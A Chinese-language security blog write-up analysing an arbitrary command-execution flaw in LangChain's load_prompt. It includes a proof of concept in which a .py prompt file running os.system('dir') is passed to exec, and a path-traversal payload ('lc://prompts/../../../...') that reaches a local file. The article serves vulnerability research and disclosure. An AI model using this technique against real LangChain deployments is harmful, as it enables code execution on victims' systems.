漏洞简介
LangChain是一个用于开发由语言模型驱动的应用程序的框架。
在LangChain受影响版本中,由于load_prompt函数加载提示文件时未对加载内容进行安全过滤,攻击者可通过构造包含恶意命令的提示文件,诱导用户加载该文件,即可造成任意系统命令执行。
漏洞复现
在项目下编写 test.py
from langchain.prompts import load_prompt
if __name__ == '__main__':loaded_prompt = load_prompt("system.py")
同级目录下编写 system.py
执行系统命令 dir
import os
os.system("dir")
运行 test.py
返回了执行系统命令dir
的结果
漏洞分析-_load_prompt_from_file
langchain.prompts.loading.load_prompt
try_load_from_hub
是尝试从给定的路径远程加载文件但是因为我们是加载本地文件,所以接下会跳转到 _load_prompt_from_file
langchain.prompts.loading._load_prompt_from_file
_load_prompt_from_file
根据文件的后缀,当后缀是 .py
时 最终会读取该文件并利用 exec
去执行也就相当于,代码可以简写为
if __name__ == '__main__':file_path = "system.py"with open(file_path, "rb") as f:exec(f.read())
漏洞分析-try_load_from_hub
因为网络的原因一直没有办法复现成功,这里就代码层面进行一个详细的分析
from langchain.prompts import load_promptif __name__ == '__main__':loaded_prompt = load_prompt("lc://prompts/../../../../../../../system.py")
langchain.prompts.loading.load_prompt
langchain.utilities.loading.try_load_from_hub
首先匹配了 HUB_PATH_RE = re.compile(r"lc(?Pref@[^:]+)?://(?Ppath.*)")
所以需要满足最开始是 lc://
然后对后面的内容进行匹配,要求第一个字段的值是 prompts
最后的后缀要在 {'py', 'yaml', 'json'}
中 最后拼接请求的url 可以通过 ../../../
绕出项目的限制,指向我们设定好的文件,并读取加载实现任意命令执行 漏洞小结
在最新版本上面进行尝试,仍然存在这个漏洞,这个漏洞的本质就是可以加载执行本地或者指定的 python 文件,但是在实际应用中这个问题应该并不是那么好进行利用,因为 python 文件的地址要可控才行。
原创稿件征集
征集原创技术文章中,欢迎投递
投稿邮箱:edu@antvsion.com
文章类型:黑客极客技术、信息安全热点安全研究分析等安全相关
通过审核并发布能收获200-800元不等的稿酬。
更多详情,点我查看!
九周年庆,戳“阅读原文“